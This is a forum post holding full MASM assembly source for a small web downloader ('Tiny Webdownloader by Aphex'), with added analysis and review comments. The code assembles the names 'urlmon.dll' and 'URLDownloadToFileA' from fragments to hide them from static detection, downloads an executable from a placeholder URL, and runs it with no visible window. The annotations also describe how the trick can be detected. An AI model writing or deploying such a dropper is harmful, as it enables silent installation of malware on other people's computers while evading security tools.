Underc0de
Programación General => ASM => Mensaje iniciado por: ANTRAX en Junio 05, 2012, 04:42:49 PM
;Tiny Webdownloader by Aphex
;Hides use of URLDownloadToFileA to foil TDS
;http://iamaphex.cjb.net
;[email protected]
.386
.model flat, stdcall
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
; Initialised data.
; Analysis note: the complete strings "urlmon.dll" and "URLDownloadToFileA"
; do not appear anywhere in this section. Both are assembled at run time from
; the Scramble* fragments, so a static search for either full name finds
; nothing. The fragments themselves ('url', 'mon', 'URL', 'Download', 'To',
; 'File', ...) are still stored as plain text, and the resolved names are
; visible to anything that observes the LoadLibrary / GetProcAddress
; arguments at run time.
.data
; Download source. The host name is a placeholder in this listing.
Url byte 'http://your.isp.goes.here/file.exe', 0
; Name of the file that is deleted, written and then executed. It has no
; directory component, so it resolves against the process's current directory.
Exe byte '~.exe', 0
; Fragments of "urlmon.dll", joined in the order 4, 3, 2, 1.
Scramble1 byte 'dll', 0
Scramble2 byte '.', 0
Scramble3 byte 'mon', 0
Scramble4 byte 'url', 0
; Fragments of "URLDownloadToFileA", joined in the order 9, 8, 7, 6, 5.
Scramble5 byte 'A', 0
Scramble6 byte 'File', 0
Scramble7 byte 'To', 0
Scramble8 byte 'Download', 0
Scramble9 byte 'URL', 0
; Uninitialised data.
.data?
; Receives "urlmon.dll": 10 characters plus the terminator, an exact fit.
UrlMonDll byte 11 dup (?)
; Receives "URLDownloadToFileA": 18 characters plus the terminator, an exact fit.
UrlDownload byte 19 dup (?)
; Module handle returned by LoadLibrary.
UrlMon dword ?
; Function pointer returned by GetProcAddress; the download call goes through it.
UrlDownloadToFile dword ?
; Entry point. Straight-line sequence with no branches and no error checks:
;   1. build the DLL name and the export name from the Scramble* fragments
;   2. LoadLibrary + GetProcAddress to resolve the export at run time
;   3. delete any existing copy of Exe, download Url to Exe, run Exe
;   4. ExitProcess(0)
; Analysis note: the visible includes cover kernel32 only, so urlmon.dll is
; presumably absent from the import table of the built binary. The behaviour
; is still observable at run time as the chain
;   LoadLibrary("urlmon.dll") -> GetProcAddress("URLDownloadToFileA")
;   -> executable written under the current directory -> WinExec of that file.
.code
_main:
;unscrambles urlmon.dll
; lstrcpyn's length of 4 counts the terminator: 3 characters ('url') + NUL.
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
invoke lstrcat, addr UrlMonDll, addr Scramble3
invoke lstrcat, addr UrlMonDll, addr Scramble2
invoke lstrcat, addr UrlMonDll, addr Scramble1
;unscrambles URLDownloadToFileA
; Same pattern: 'URL' + NUL, then the remaining fragments are appended.
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
invoke lstrcat, addr UrlDownload, addr Scramble8
invoke lstrcat, addr UrlDownload, addr Scramble7
invoke lstrcat, addr UrlDownload, addr Scramble6
invoke lstrcat, addr UrlDownload, addr Scramble5
;loads urlmon.dll
; NOTE(review): the returned handle is stored without being tested for 0.
invoke LoadLibrary, addr UrlMonDll
mov UrlMon, eax
;links URLDownloadToFileA dynamically
; NOTE(review): the returned pointer is stored without being tested for 0;
; if resolution fails, the indirect call below goes through a null pointer.
invoke GetProcAddress, UrlMon, addr UrlDownload
mov UrlDownloadToFile, eax
;delete previous version
; Return value ignored; the file may simply not exist yet.
invoke DeleteFile, addr Exe
;downloads the exe
; Arguments are pushed by hand, right to left, for the stdcall target
; URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB).
push 0
; ^ lpfnCB = NULL (no status callback)
push 0
; ^ dwReserved = 0
push offset Exe
; ^ szFileName = Exe
push offset Url
; ^ szURL = Url
push 0
; ^ pCaller = NULL
; Indirect call through the dword variable filled in by GetProcAddress.
; The result left in eax is not examined before the file is executed.
call UrlDownloadToFile
;runs the exe
; Second argument 0 is uCmdShow = SW_HIDE, so the started program gets no
; visible window. Exe is again a relative name.
invoke WinExec, addr Exe, 0
;exits
invoke ExitProcess, 0
end _main
By X-Ray Cat